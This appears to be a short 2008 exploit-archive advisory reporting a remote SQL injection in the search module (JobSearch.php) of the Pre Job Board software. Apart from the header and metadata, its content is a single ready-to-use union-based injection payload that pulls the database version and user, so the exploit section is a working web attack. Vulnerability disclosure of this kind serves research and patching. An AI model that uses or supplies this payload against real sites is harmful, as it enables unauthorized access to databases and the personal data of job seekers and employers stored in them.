id: 3177
date: 06/13/2008
title: Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability
author: JosS
cves: 

================================================================
Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability
================================================================



[+] Info:

[~] Bug found by JosS
[~] EspSeC & Hack0wn!.

[~] Software: Pre Job Board (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch.php

[~] /jobseekers/JobSearch.php (search module)

[+] Exploit:

[~] ' and 1=2 union all select 1,2,3,4,version(),user(),7,8,9,0,1,2,3,4,5/*




#  0day.today [2023-03-26]  #